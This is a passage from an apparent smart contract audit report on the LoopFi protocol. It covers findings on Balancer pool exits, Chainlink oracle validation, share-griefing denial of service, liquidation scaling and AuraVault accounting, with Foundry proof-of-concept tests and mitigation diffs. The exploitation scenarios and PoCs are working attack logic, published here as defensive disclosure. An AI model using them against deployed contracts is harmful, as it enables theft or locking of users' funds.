// (around 49 collateral tokens are deposited into the balancer position)
uint256[] memory maxAmountsIn = new uint256[](3);
maxAmountsIn[0] = 0;
maxAmountsIn[1] = borrowAmount / 2 - 1 ether;
maxAmountsIn[2] = 0;
uint256[] memory tokensIn = new uint256[](2);
tokensIn[0] = borrowAmount / 2 - 1 ether;
tokensIn[1] = 0;
position: address(userProxy),
vault: address(vault),
collateralToken: address(stakingLPEth),
primarySwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_IN,
assetIn: address(underlyingToken),
amount: flashLoanAmount,
limit: 0,
recipient: address(positionAction),
deadline: block.timestamp,
args: abi.encode(weightedPoolIdArray, assets)
auxSwap: emptySwap,
auxAction: PoolActionParams(
abi.encode(poolId, tokens, tokensIn, maxAmountsIn)
// Collateral remains the same, debt increases by 50 ETH
// User has around 56 Balancer LP tokens
(uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy));
assertEq(collateral, depositAmount);
assertEq(debt, borrowAmount + flashLoanAmount);
assertEq(IERC20(wstETH_bb_a_WETH_BPTl).balanceOf(user) / 1 ether, 56);
// Verify that the position action contract and the user don't hold any collateral tokens
assertEq(token.balanceOf(address(positionAction)), 0);
assertEq(token.balanceOf(user), 0);
uint256[] memory minAmountsOut = new uint256[](3);
minAmountsOut[0] = 0;
minAmountsOut[1] = 0;
minAmountsOut[2] = 0;
// Send the Balancer LP tokens to the position action contract, to exit the Balancer pool
uint256 bptAmount = IERC20(wstETH_bb_a_WETH_BPTl).balanceOf(user);
IERC20(wstETH_bb_a_WETH_BPTl).transfer(address(positionAction), bptAmount);
// Leverage down the position
// Takes a flash loan of 40 ETH borrow tokens (decreases the debt), withdraws 70 ETH collateral tokens (residual should be sent to the user)
// Swap collateral tokens to borrow tokens, to repay the flash loan
// Exits the Balancer pool, and sends the residual collateral tokens to the user (this is where the loss of funds occurs)
position: address(userProxy),
vault: address(vault),
collateralToken: address(stakingLPEth),
auxSwap: emptySwap,
primarySwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_OUT,
assetIn: address(token),
amount: 40 ether,
limit: 50 ether,
recipient: address(positionAction),
deadline: block.timestamp,
args: abi.encode(weightedPoolIdArray, assets)
auxAction: PoolActionParams(
abi.encode(poolId, wstETH_bb_a_WETH_BPTl, bptAmount, 0, tokens, minAmountsOut)
70 ether,
// Collateral is 180 ETH, debt is 110 ETH
(uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy));
assertEq(collateral, depositAmount - 70 ether);
assertEq(debt, borrowAmount + flashLoanAmount - 40 ether);
// All balancer LP tokens are burnt
assertEq(IERC20(wstETH_bb_a_WETH_BPTl).balanceOf(user), 0);
assertEq(IERC20(wstETH_bb_a_WETH_BPTl).balanceOf(address(positionAction)), 0);
// User has 59 collateral tokens, Balancer's exit tokens (49 from above) + residual ~(50 - 40)
assertEq(token.balanceOf(user) / 1 ether, 59);
// Position action now holds 20 collateral tokens that are stuck (70 - ~50)
assertEq(token.balanceOf(address(positionAction)) / 1 ether, 20);
function _createBalancerPool(address t1, address t2) internal returns (IComposableStablePool pool_) {
uint256 amount = 5_000_000_000 ether;
deal(t1, address(this), amount);
deal(t2, address(this), amount);
uint256[] memory maxAmountsIn = new uint256[](2);
address[] memory assets = new address[](2);
assets[0] = t1;
uint256[] memory weights = new uint256[](2);
weights[0] = 500000000000000000;
weights[1] = 500000000000000000;
bool tokenPlaced;
address tempAsset;
for (uint256 i; i < assets.length; i++) {
if (!tokenPlaced) {
if (uint160(assets[i]) > uint160(t2)) {
tokenPlaced = true;
tempAsset = assets[i];
assets[i] = t2;
} else if (i == assets.length - 1) {
assets[i] = t2;
} else {
address placeholder = assets[i];
assets[i] = tempAsset;
tempAsset = placeholder;
for (uint256 i; i < assets.length; i++) {
maxAmountsIn[i] = ERC20(assets[i]).balanceOf(address(this));
ERC20(assets[i]).safeApprove(address(balancerVault), maxAmountsIn[i]);
pool_ = weightedPoolFactory.create(
3e14, // swapFee (0.03%)
address(this) // owner
assets: assets,
maxAmountsIn: maxAmountsIn,
userData: abi.encode(JoinKind.INIT, maxAmountsIn),
fromInternalBalance: false
function getForkBlockNumber() internal pure virtual override(IntegrationTestBase) returns (uint256) {
return 17870449; // Aug-08-2023 01:17:35 PM +UTC
Recommended Mitigation Steps
Handle the multiple scenarios where the recipient might not be the position actions contract or where the tokenOut
from Balancer isn’t the same as the 4626’s underlying token. In the if block, just set the tokenOut
as the contract’s balance which should handle all edge cases.
function _onDecreaseLever(
LeverParams memory leverParams,
uint256 subCollateral
) internal override returns (uint256 tokenOut) {
if (leverParams.auxAction.args.length != 0) {
bytes memory exitData = _delegateCall(
abi.encodeWithSelector(poolAction.exit.selector, leverParams.auxAction)
- tokenOut = abi.decode(exitData, (uint256));
+ tokenOut = IERC20(IERC4626(leverParams.collateralToken).asset()).balanceOf(address(this));
Assessed type
Koolex (judge) decreased severity to Medium
Note: For full discussion, see here.
[M-08] PoolAction::_balancerExit
returns wrong token out amount
Submitted by 0xAlix2
Users use PoolAction::exit
to exit a Balancer pool position, it calls _balancerExit
to do the job. It is expected to exit the pool and return the amount out of the token; however, it returns the whole recipient’s balance, without considering the case where the recipient is holding an amount of the same token from different sources. It’ll return an exaggerated amount rather than the amount out.
This will cause PositionAction4626::_onDecreaseLever
to revert sometimes. In this case, the user is leveraging down, exiting a Balancer pool, and holds some tokenOut
amount. In PositionAction::onCreditFlashLoan
, withdrawnCollateral
would be an unreal exaggerated amount, and the contract will try to send back residualAmount
which will be greater than its balance.
Proof of Concept
Add the following test in src/test/integration/PoolAction.t.sol
function test_wrongBalancerExitAmount() public {
uint256 amount = 10 ether;
deal(wstETH, user, amount * 2);
(uint8 v, bytes32 r, bytes32 s) = PermitMaker.getPermit2TransferFromSignature(
PermitParams[] memory permitParamsArray = new PermitParams[](3);
permitParamsArray[1] = PermitParams(ApprovalType.PERMIT2, amount, NONCE, block.timestamp, v, r, s);
address[] memory tokens = new address[](3);
tokens[0] = wstETH_bb_a_WETH_BPTl;
tokens[1] = wstETH;
tokens[2] = bbaweth;
uint256[] memory maxAmountsIn = new uint256[](3);
maxAmountsIn[0] = 0;
maxAmountsIn[1] = amount;
maxAmountsIn[2] = 0;
uint256[] memory tokensIn = new uint256[](2);
tokensIn[0] = amount;
tokensIn[1] = 0;
uint256[] memory minAmountsOut = new uint256[](3);
minAmountsOut[0] = 0;
minAmountsOut[1] = 0;
minAmountsOut[2] = 0;
// Joins Balancer pool with 10 WSTETH
PoolActionParams(Protocol.BALANCER, 0, user, abi.encode(poolId, tokens, tokensIn, maxAmountsIn))
uint256 balancerLP = ERC20(wstETH_bb_a_WETH_BPTl).balanceOf(user);
// Receives 11 Balancer LP tokens
assertEq(balancerLP / 1 ether, 11);
// Balance is 10 WSTETH
assertEq(ERC20(wstETH).balanceOf(user), amount);
// Transfer Balancer LP tokens to PoolAction
ERC20(wstETH_bb_a_WETH_BPTl).transfer(address(poolAction), balancerLP);
// Exits the Balancer pool
uint256 amountOut = poolAction.exit(
abi.encode(poolId, wstETH_bb_a_WETH_BPTl, balancerLP, 0, tokens, minAmountsOut)
// Amount returned by the function is 19 WSTETH instead of 9 WSTETH
assertEq(amountOut / 1 ether, 19);
// Balance is 19 WSTETH
assertEq(ERC20(wstETH).balanceOf(user) / 1 ether, 19);
Recommended Mitigation Steps
Instead of returning the whole recipient’s balance, return the difference between his balances before and after the exit.
function _balancerExit(PoolActionParams memory poolActionParams) internal returns (uint256 retAmount) {
bytes32 poolId,
address bpt,
uint256 bptAmount,
uint256 outIndex,
address[] memory assets,
uint256[] memory minAmountsOut
) = abi.decode(poolActionParams.args, (bytes32, address, uint256, uint256, address[], uint256[]));
if (bptAmount != 0) IERC20(bpt).forceApprove(address(balancerVault), bptAmount);
+ uint256 tmpOutIndex = outIndex;
+ for (uint256 i = 0; i <= tmpOutIndex; i++) if (assets[i] == bpt) tmpOutIndex++;
+ uint256 balanceBefore = IERC20(assets[tmpOutIndex]).balanceOf(poolActionParams.recipient);
assets: assets,
minAmountsOut: minAmountsOut,
userData: abi.encode(ExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT, bptAmount, outIndex),
toInternalBalance: false
- for (uint256 i = 0; i <= outIndex; ) {
- if (assets[i] == bpt) {
- outIndex++;
- }
- unchecked {
- ++i;
- }
- }
- return IERC20(assets[outIndex]).balanceOf(address(poolActionParams.recipient));
+ return IERC20(assets[tmpOutIndex]).balanceOf(poolActionParams.recipient) - balanceBefore;
Assessed type
Could you please adjust the PoC to support this claim in PJQA please?
This will cause
to revert sometimes. In this case, the user is leveraging down, exiting a Balancer pool, and holds sometokenOut
amount. InPositionAction::onCreditFlashLoan
would be an unreal exaggerated amount, and the contract will try to send backresidualAmount
which will be greater than it’s balance
@Koolex - My bad for not providing it in the original issue, but I wanted to keep it as simple as possible as this POC is a bit more complicated.
The following test assuming 3 reported bugs are fixed, similar to issue #240, to workaround this:
, replace:uint256 withdrawnCollateral = ICDPVault(leverParams.vault).withdraw(address(this), subCollateral);
uint256 withdrawnCollateral = ICDPVault(leverParams.vault).withdraw(leverParams.position, subCollateral);
- In
, replace:return ICDPVault(leverParams.vault).deposit(address(this), addCollateralAmount);
return addCollateralAmount;
- At the top of
, add:poolToken = balancerVault.getPool(poolId);
contract PositionAction4626_Lever_Test is IntegrationTestBase { using SafeERC20 for ERC20; PRBProxy userProxy; address user; CDPVault vault; StakingLPEth stakingLPEth; PositionAction4626 positionAction; PermitParams emptyPermitParams; SwapParams emptySwap; PoolActionParams emptyPoolActionParams; bytes32[] weightedPoolIdArray; address constant wstETH_bb_a_WETH_BPTl = 0x41503C9D499ddbd1dCdf818a1b05e9774203Bf46; address constant wstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0; address constant bbaweth = 0xbB6881874825E60e1160416D6C426eae65f2459E; bytes32 constant poolId = 0x41503c9d499ddbd1dcdf818a1b05e9774203bf46000000000000000000000594; function setUp() public override { super.setUp(); setGlobalDebtCeiling(15_000_000 ether); token = ERC20PresetMinterPauser(wstETH); stakingLPEth = new StakingLPEth(address(token), "Staking LP ETH", "sLPETH"); stakingLPEth.setCooldownDuration(0); vault = createCDPVault(stakingLPEth, 5_000_000 ether, 0, 1.25 ether, 1.0 ether, 1.05 ether); createGaugeAndSetGauge(address(vault), address(stakingLPEth)); user = vm.addr(0x12341234); userProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(user)))); positionAction = new PositionAction4626( address(flashlender), address(swapAction), address(poolAction), address(vaultRegistry) ); weightedUnderlierPoolId = _createBalancerPool(address(token), address(underlyingToken)).getPoolId(); oracle.updateSpot(address(token), 1 ether); oracle.updateSpot(address(stakingLPEth), 1 ether); weightedPoolIdArray.push(weightedUnderlierPoolId); } function test_wrongBalancerExitAmount_2() public { uint256 depositAmount = 250 ether; uint256 borrowAmount = 100 ether; uint256 flashLoanAmount = borrowAmount / 2; deal(address(token), user, depositAmount); address[] memory assets = new address[](2); assets[0] = address(underlyingToken); assets[1] = address(token); address[] memory tokens = new address[](3); tokens[0] = wstETH_bb_a_WETH_BPTl; tokens[1] = wstETH; tokens[2] = bbaweth; vm.startPrank(user); // Deposit `wstETH` to get `sLPETH` // Deposit 250 `sLPETH` to vault { token.approve(address(stakingLPEth), depositAmount); stakingLPEth.approve(address(userProxy), depositAmount); stakingLPEth.deposit(depositAmount, user); userProxy.execute( address(positionAction), abi.encodeWithSelector( positionAction.deposit.selector, address(userProxy), address(vault), CollateralParams({ targetToken: address(stakingLPEth), amount: depositAmount, collateralizer: address(user), auxSwap: emptySwap }), emptyPermitParams ) ); } // Borrow 100 ETH { userProxy.execute( address(positionAction), abi.encodeWithSelector( positionAction.borrow.selector, address(userProxy), address(vault), CreditParams({amount: borrowAmount, creditor: user, auxSwap: emptySwap}) ) ); // Collateral is 250 ETH, debt is 100 ETH (uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy)); assertEq(collateral, depositAmount); assertEq(debt, borrowAmount); } // Increase leverage // Takes a flash loan of 50 ETH borrow tokens (adds that as a debt) // Swap the borrow tokens to collateral tokens, and join Balancer pool // (around 49 collateral tokens are deposited into the balancer position) { uint256[] memory maxAmountsIn = new uint256[](3); maxAmountsIn[0] = 0; maxAmountsIn[1] = borrowAmount / 2 - 1 ether; maxAmountsIn[2] = 0; uint256[] memory tokensIn = new uint256[](2); tokensIn[0] = borrowAmount / 2 - 1 ether; tokensIn[1] = 0; userProxy.execute( address(positionAction), abi.encodeWithSelector( positionAction.increaseLever.selector, LeverParams({ position: address(userProxy), vault: address(vault), collateralToken: address(stakingLPEth), primarySwap: SwapParams({ swapProtocol: SwapProtocol.BALANCER, swapType: SwapType.EXACT_IN, assetIn: address(underlyingToken), amount: flashLoanAmount, limit: 0, recipient: address(positionAction), deadline: block.timestamp, args: abi.encode(weightedPoolIdArray, assets) }), auxSwap: emptySwap, auxAction: PoolActionParams( Protocol.BALANCER, 0, user, abi.encode(poolId, tokens, tokensIn, maxAmountsIn) ) }), address(0), 0, address(user), emptyPermitParams ) ); // Collateral remains the same, debt increases by 50 ETH // User has around 56 Balancer LP tokens (uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy)); assertEq(collateral, depositAmount); assertEq(debt, borrowAmount + flashLoanAmount); assertEq(IERC20(wstETH_bb_a_WETH_BPTl).balanceOf(user) / 1 ether, 56); } { // Verify that the position action contract and the user don't hold any collateral tokens assertEq(token.balanceOf(address(positionAction)), 0); assertEq(token.balanceOf(user), 0); uint256[] memory minAmountsOut = new uint256[](3); minAmountsOut[0] = 0; minAmountsOut[1] = 0; minAmountsOut[2] = 0; // Send the Balancer LP tokens to the position action contract, to exit the Balancer pool uint256 bptAmount = IERC20(wstETH_bb_a_WETH_BPTl).balanceOf(user); IERC20(wstETH_bb_a_WETH_BPTl).transfer(address(positionAction), bptAmount); deal(address(token), user, depositAmount); // User holds 100 tokens assertEq(token.balanceOf(user), depositAmount); // Leverage down the position // Takes a flash loan of 40 ETH borrow tokens (decreases the debt), withdraws 70 ETH collateral tokens (residual should be sent to the user) // Swap collateral tokens to borrow tokens, to repay the flash loan // Exits the Balancer pool, and sends the residual collateral tokens to the user // REVERTS vm.expectRevert(bytes("ERC20: transfer amount exceeds balance")); userProxy.execute( address(positionAction), abi.encodeWithSelector( positionAction.decreaseLever.selector, LeverParams({ position: address(userProxy), vault: address(vault), collateralToken: address(stakingLPEth), auxSwap: emptySwap, primarySwap: SwapParams({ swapProtocol: SwapProtocol.BALANCER, swapType: SwapType.EXACT_OUT, assetIn: address(token), amount: 40 ether, limit: 50 ether, recipient: address(positionAction), deadline: block.timestamp, args: abi.encode(weightedPoolIdArray, assets) }), auxAction: PoolActionParams( Protocol.BALANCER, 0, user, abi.encode(poolId, wstETH_bb_a_WETH_BPTl, bptAmount, 0, tokens, minAmountsOut) ) }), 70 ether, address(user) ) ); } } function _createBalancerPool(address t1, address t2) internal returns (IComposableStablePool pool_) { uint256 amount = 5_000_000_000 ether; deal(t1, address(this), amount); deal(t2, address(this), amount); uint256[] memory maxAmountsIn = new uint256[](2); address[] memory assets = new address[](2); assets[0] = t1; uint256[] memory weights = new uint256[](2); weights[0] = 500000000000000000; weights[1] = 500000000000000000; bool tokenPlaced; address tempAsset; for (uint256 i; i < assets.length; i++) { if (!tokenPlaced) { if (uint160(assets[i]) > uint160(t2)) { tokenPlaced = true; tempAsset = assets[i]; assets[i] = t2; } else if (i == assets.length - 1) { assets[i] = t2; } } else { address placeholder = assets[i]; assets[i] = tempAsset; tempAsset = placeholder; } } for (uint256 i; i < assets.length; i++) { maxAmountsIn[i] = ERC20(assets[i]).balanceOf(address(this)); ERC20(assets[i]).safeApprove(address(balancerVault), maxAmountsIn[i]); } pool_ = weightedPoolFactory.create( "50WETH-50TOKEN", "50WETH-50TOKEN", assets, weights, 3e14, // swapFee (0.03%) address(this) // owner ); balancerVault.joinPool( pool_.getPoolId(), address(this), address(this), JoinPoolRequest({ assets: assets, maxAmountsIn: maxAmountsIn, userData: abi.encode(JoinKind.INIT, maxAmountsIn), fromInternalBalance: false }) ); } function getForkBlockNumber() internal pure virtual override(IntegrationTestBase) returns (uint256) { return 17870449; // Aug-08-2023 01:17:35 PM +UTC } }
@0xAlix2 - Could you please explain why should we update the code according to point 3 above?
@Koolex - The third point refers to another issue that is reported, Issue 241, it just bypasses that issue and makes sure it doesn’t revert because of that issue. Issue #241 just shows a more sophisticated mitigation.
[M-09] PendleLPOracle::_fetchAndValidate
uses Chainlink’s deprecated answeredInRound
Submitted by 0xAlix2, also found by 0xAlix2, peanuts (1, 2), Bauchibred, Rhaydden, 0xhacksmithh, unRekt, inh3l, atoko, 0xjoaovpsantos, Kaysoft (1, 2, 3), lightoasis, jolah1, josephxander, web3km, 0xINFINITY (1, 2, 3), Spearmint, zhaojohnson, Bigsam, 0xBugSlayer, Infect3d, Sungyu, yashar (1, 2), emmac002, pks_, y0ng0p3, EPSec, grearlake, 0xspryon, 0XRolko, 0xAadi, Damola0x, 4B, Sparrow, crypticdefense, NexusAudits, pkqs90 (1, 2), novamanbg, and BiasedMerc
uses Chainlink to get the price of Pendle’s underlying asset in ETH; this is done using _fetchAndValidate
. That function uses answeredInRound
, which is deprecated according to Chainlink docs.
: Deprecated - Previously used when answers could take multiple rounds to be computed.
This results in invalid/wrong prices from Chainlink.
Recommended Mitigation Steps
Remove the usage of answeredInRound
in PendleLPOracle::_fetchAndValidate
Assessed type
[M-10] Malicious actor can abuse the minimum shares check in StakingLPEth
and cause DoS or locked funds for the last user that withdraws
Submitted by web3km, also found by asui, Eeyore, 0xMax1mus, Spearmint, boraichodrunkenmaster, zhaojohnson, peanuts, lian886 (1, 2), Infect3d, yashar, emmac002, Walter, Afriauditor, zhaojie (1, 2), 0xpiken, grearlake, Breeje, 0xAadi, hash, pkqs90, and nnez
The last user that tries to cooldown/withdraw his share will not be able to withdraw the full deposited amount.
Proof of Concept
The StakingLpEth
contract implements a check for minimum shares to ensure that inflation attacks cannot happen:
function _checkMinShares() internal view {
uint256 _totalSupply = totalSupply();
if (_totalSupply > 0 && _totalSupply < MIN_SHARES) revert MinSharesViolation();
The _checkMinShares
function is called on every deposit/withdrawal to ensure that _totalSupply
does not become less than MIN_SHARES
function _deposit(address caller, address receiver, uint256 assets, uint256 shares) internal override nonReentrant {
super._deposit(caller, receiver, assets, shares);
* @dev Withdraw/redeem common workflow.
* @param caller tx sender
* @param receiver where to send assets
* @param _owner where to burn shares from
* @param assets asset amount to transfer out
* @param shares shares to burn
function _withdraw(
address caller,
address receiver,
address _owner,
uint256 assets,
uint256 shares
) internal override nonReentrant {
super._withdraw(caller, receiver, _owner, assets, shares);
However, this check opens up a griefing opportunities for attackers to either make sure that the last user that tries to withdraw will only be able to withdraw (his balance - MIN_SHARES
) locking the MIN_SHARES
with no way of getting them out or completely DoSing the deposit/mint functionality of the vault.
Exploitation Scenarios:
Locking funds for the last user that withdraws/cooldowns:
- User1 mints
shares. - Attacker sees that and backruns him minting only 1 wei shares.
- User1 tries to cooldown/withdraw all of his shares. However after
function executes the new_totalSupply
will be equal to 1 which is less thanMIN_SHARES
, which will make_checkMinShares
function revert. - User2 comes and mints
shares. - Now that User2 deposited User1 will be able to withdraw his shares.
- The cycle repeats of every new user waiting for the next one to deposit in order to withdraw/cooldown full amount, until the last one which will not be able to withdraw full amount leaving
amount stuck.
DoS of deposit/mint functionality:
The contract calculates the share the same way as every ERC4626
function _convertToShares(uint256 assets, Math.Rounding rounding) internal view virtual returns (uint256) {
return assets.mulDiv(totalSupply() + 10 ** _decimalsOffset(), totalAssets() + 1, rounding);
Since decimalsOffset() == 0
and totalAssets()
will equal to the balance of lpEth
in the contract.
The calculation will be:
f(share) = (lpEth * totalSupply + 1) / (totalLpEth() + 1)
- Right after deployment the attacker will transfer 0.01 lpEth to the contract without minting any shares.
- Suppose the next user wants to deposit 1000 lpEth, which is quite a large amount.
- His shares will be calculated as:
(1000e18 * 0 + 1) / (0.01e18 + 1) = $100000
Which is less than MIN_SHARES
, which ultimately makes the function revert. The user will have to deposit 100_000_000_000_000
lpEth in order to pass the minimum shares requirement.
Recommended Mitigation Steps
Consider funding the contract in the deployment script and remove the MIN_SHARES
check to ensure that no DoS or locking of funds is possible.
Assessed type
0xtj24 (LoopFi) acknowledged and commented:
This behaviour is expected. After deployment of the contracts, the protocol will mint the minimum shares.
Koolex (judge) decreased severity to Medium
Note: For full discussion, see here.
[M-11] CDPVault.liquidatePosition()
does not scale takeCollateral
with tokenScale
; therefore, it might send the wrong amount of collateral to the liquidator when tokenScale ! = 1 ether
Submitted by chaduke, also found by lightoasis, jigster, and AKA8u9K111er
First of all, in CDPVault
, the amount of collateral
maintained in each position is scaled using tokenScale
. See the code in deposit
and the function modifyCollateralAndDebt()
For example, when withdrawing collateral, it will scale it with tokenScale
from internal amount:
uint256 amount = wmul(abs(deltaCollateral), tokenScale);
token.safeTransfer(collateralizer, amount);
However, when sending collateral to the liquidator, it uses the internal amount without scaling by tokenScale
in function liquidatePosition
at L565.
token.safeTransfer(msg.sender, takeCollateral);
As a result, when tokenScale < 10 ** 18
, the above line actually send more tokens to the liquidator than it is supposed to, a loss of funds for the protocol.
In the following POC, we show:
- We use a collateral token that has 16 decimals, as a a result,
tokenScale = 19 ** 16
. - Frank deposits 1M units of collateral.
- The test contract deposits 100 units of collateral and then borrows 10 ether of underlying tokens, with the price of collateral being 1 ether.
- The price of the collateral drops to 0.1 ether.
- Kathy liquidates the position of the test contract with 1 ether of underlying tokens.
- Kathy is supposed to receive 10.52 units of collateral; however, she receives 1052 units of collateral instead due to the above bug. This amount is much greater than the collateral for the position held by the test contract.
- The protocol loses collateral to the liquidator, in particular, the collateral that is supposed to be owned by Frank.
- Now, when Frank tries to withdraw his collateral, he fails.
Please run forge test --match-test testLiquidate1 -vv
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;
import "forge-std/console2.sol";
import {TestBase, ERC20PresetMinterPauser} from "../TestBase.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {IERC20Metadata} from "@openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol";
import {IOracle} from "../../interfaces/IOracle.sol";
import {ICDPVaultBase} from "../../interfaces/ICDPVault.sol";
import {CDPVaultConstants, CDPVaultConfig} from "../../interfaces/ICDPVault.sol";
import {IPermission} from "../../interfaces/IPermission.sol";
import {WAD, wmul, wdiv, wpow, toInt256} from "../../utils/Math.sol";
import {CDPVault, VAULT_CONFIG_ROLE} from "../../CDPVault.sol";
import {console} from "forge-std/console.sol";
import {StdCheats} from "forge-std/StdCheats.sol";
contract MockTokenScaled is ERC20PresetMinterPauser {
uint8 private _decimals;
constructor(string memory name, string memory symbol, uint8 decimals_) ERC20PresetMinterPauser(name, symbol) {
_decimals = decimals_;
function decimals() public view override returns (uint8) {
return _decimals;
import {CDPVault, VAULT_CONFIG_ROLE} from "../../CDPVault.sol";
import {console} from "forge-std/console.sol";
contract CDPVaultWrapper is CDPVault {
constructor(CDPVaultConstants memory constants, CDPVaultConfig memory config) CDPVault(constants, config) {}
contract PositionOwner {
constructor(IPermission vault) {
// Allow deployer to modify Position
vault.modifyPermission(msg.sender, true);
contract CDPVaultTest is TestBase {
MockTokenScaled tokenScaled;
function _depositCollateral(CDPVault vault, uint256 amount) internal {
token.mint(address(this), amount);
(uint256 collateralBefore, , , , , ) = vault.positions(address(this));
token.approve(address(vault), amount);
vault.deposit(address(this), amount);
(uint256 collateralAfter, , , , , ) = vault.positions(address(this));
assertEq(collateralAfter, collateralBefore + amount);
function _modifyCollateralAndDebt(CDPVault vault, int256 collateral, int256 debt) internal {
if (debt < 0) {
mockWETH.mint(address(this), uint256(-debt));
mockWETH.approve(address(vault), uint256(-debt));
if (collateral > 0) {
token.mint(address(this), uint256(collateral));
token.approve(address(vault), uint256(collateral));
(uint256 collateralBefore, uint256 debtBefore, , , , ) = vault.positions(address(this));
uint256 virtualDebtBefore = virtualDebt(vault, address(this));
uint256 vaultCreditBefore = credit(address(this));
vault.modifyCollateralAndDebt(address(this), address(this), address(this), collateral, debt);
(uint256 collateralAfter, uint256 debtAfter, , , , ) = vault.positions(address(this));
assertEq(toInt256(collateralAfter), toInt256(collateralBefore) + collateral);
assertEq(toInt256(debtAfter), toInt256(debtBefore) + debt);
uint256 virtualDebtAfter = virtualDebt(vault, address(this));
int256 deltaDebt = toInt256(virtualDebtAfter) - toInt256(virtualDebtBefore);
uint256 tokensAfter = credit(address(this));
assertEq(toInt256(tokensAfter), toInt256(vaultCreditBefore) + deltaDebt);
uint256 vaultCreditAfter = credit(address(this));
assertEq(toInt256(vaultCreditBefore + virtualDebtAfter), toInt256(vaultCreditAfter + virtualDebtBefore));
assertEq(toInt256(vaultCreditBefore + virtualDebtAfter), toInt256(vaultCreditAfter + virtualDebtBefore));
function _updateSpot(uint256 price) internal {
oracle.updateSpot(address(token), price);
function _collateralizationRatio(CDPVault vault) internal view returns (uint256) {
(uint256 collateral, , , , , ) = vault.positions(address(this));
if (collateral == 0) return type(uint256).max;
return wdiv(wmul(collateral, vault.spotPrice()), virtualDebt(vault, address(this)));
function _createVaultWrapper(uint256 liquidationRatio) private returns (CDPVaultWrapper vault) {
CDPVaultConstants memory constants = _getDefaultVaultConstants();
CDPVaultConfig memory config = _getDefaultVaultConfig();
config.liquidationRatio = uint64(liquidationRatio);
vault = new CDPVaultWrapper(constants, config);
function _setDebtCeiling(CDPVault vault, uint256 debtCeiling) internal {
// cdm.setParameter(address(vault), "debtCeiling", debtCeiling);
liquidityPool.setCreditManagerDebtLimit(address(vault), debtCeiling);
function printPosition(CDPVault vault, address p, string memory name) public{
console2.log("\n =================================================");
console2.log("position infor for ", name);
(uint256 collateral, // [wad]
uint256 debt, // [wad]
uint256 lastDebtUpdate, // [timestamp]
uint256 cumulativeIndexLastUpdate,
uint192 cumulativeQuotaIndexLU,
uint128 cumulativeQuotaInterest
) = vault.positions(p);
console2.log("collateral: ", collateral);
console2.log("debt: ", debt);
console2.log("cumulativeQuotaInterest: ", cumulativeQuotaInterest);
console2.log("lastUpdate: ", lastDebtUpdate);
uint256 cumulativeIndexNow = liquidityPool.baseInterestIndex();
uint256 cumulativeQuotaIndexNow = quotaKeeper.cumulativeIndex(address(tokenScaled));
console2.log("cumulatveIndexNow: ", cumulativeIndexNow);
console2.log("cumulativeIndexLastUpdate:", cumulativeIndexLastUpdate);
console2.log("cumulativeQuotaIndexNow: ", cumulativeQuotaIndexNow);
console2.log("cumulativeQuotaIndexLU: ", cumulativeQuotaIndexLU);
console2.log("=================================================\n ");
function printBalances(address a, string memory name) public{
console2.log("\n =================================================");
console2.log("Balances for ", name);
console2.log("Collateral balance: ", token.balanceOf(a));
console2.log("borrow token balance: ", mockWETH.balanceOf(a));
console2.log("=================================================\n ");
function testLiquidate1() public{
address Frank = makeAddr("Frank");
address Kathy = makeAddr("Kathy");
tokenScaled = new MockTokenScaled("TestToken", "TST", 16); // 16 decimals
CDPVault vault = createCDPVault(tokenScaled, 150 ether, 0, 1.25 ether, 1.0 ether, 0.95 ether);
createGaugeAndSetGauge(address(vault), address(tokenScaled));
// frank does a deposit 1M units
tokenScaled.mint(Frank, 1000000*10**16);
tokenScaled.approve(address(vault), 1000000*10**16); // 100 units
vault.deposit(Frank, 1000000*10**16);
// this test contract does a deposit 100 units
tokenScaled.mint(address(this), 100*10**16);
tokenScaled.approve(address(vault), 100*10**16); // 100 units
vault.deposit(address(this), 100*10**16);
oracle.updateSpot(address(tokenScaled), 1 ether);
vault.borrow(address(this), address(this), 10 ether); // 10 ether debt, 100 units of collateral
console2.log("\n \n --------------------liquidate now -----------------");
oracle.updateSpot(address(tokenScaled), 0.1 ether);
mockWETH.mint(Kathy, 1 ether);
mockWETH.approve(address(vault), 1 ether);
vault.liquidatePosition(address(this), 1 ether);
printPosition(vault, address(this), "this position");
vm.expectRevert(); // not enough collatreral to withdraw now
vault.withdraw(Frank, 1000000*10**16);
Tools Used
Recommended Mitigation Steps
Scale the collateral amount from internal representation to the real amount by tokenScale
Assessed type
Koolex (judge) decreased severity to Medium
Note: For full discussion, see here.
[M-12] Unclaimed rewards handling issue in AuraVault
contract functions (AuraVault::deposit
, AuraVault::mint
, AuraVault::withdraw
and AuraVault::redeem
Submitted by Agontuk, also found by 0xc0ffEE
The AuraVault
contract is designed to manage assets and distribute rewards from an Aura RewardsPool
. The primary functions involved in asset management are deposit()
, mint()
, withdraw()
, and redeem()
. These functions rely on the totalAssets()
function to calculate the total value of assets managed by the vault. However, the current implementation of totalAssets()
does not account for unclaimed rewards, which can lead to incorrect calculations of shares and assets.
The totalAssets()
function currently only returns the balance of the underlying asset in the reward pool:
File: AuraVault.sol
175: function totalAssets() public view virtual override(IERC4626, ERC4626) returns (uint256) {
176: return IPool(rewardPool).balanceOf(address(this));
177: }
This function does not include unclaimed rewards, which can be obtained using IPool(rewardPool).earned(address(this))
. As a result, the deposit()
, mint()
, withdraw()
, and redeem()
functions may calculate shares and assets incorrectly, potentially causing users to receive more or fewer shares/assets than they should.
The primary impact of this issue is that users may receive an incorrect number of shares or assets due to the inaccurate calculation of totalAssets()
. This can lead to financial discrepancies, where some users may gain an unfair advantage while others may suffer losses. The severity of this issue is medium to high, depending on the extent of the financial impact on users. An incorrect totalAssets()
value affects the accuracy of the deposit()
, mint()
, withdraw()
, and redeem()
functions, leading to an unfair distribution of assets.
Proof of Concept
User deposits assets:
- User calls
deposit(1000, receiver)
. totalAssets()
returns 10,000 (current balance in reward pool).previewDeposit(1000)
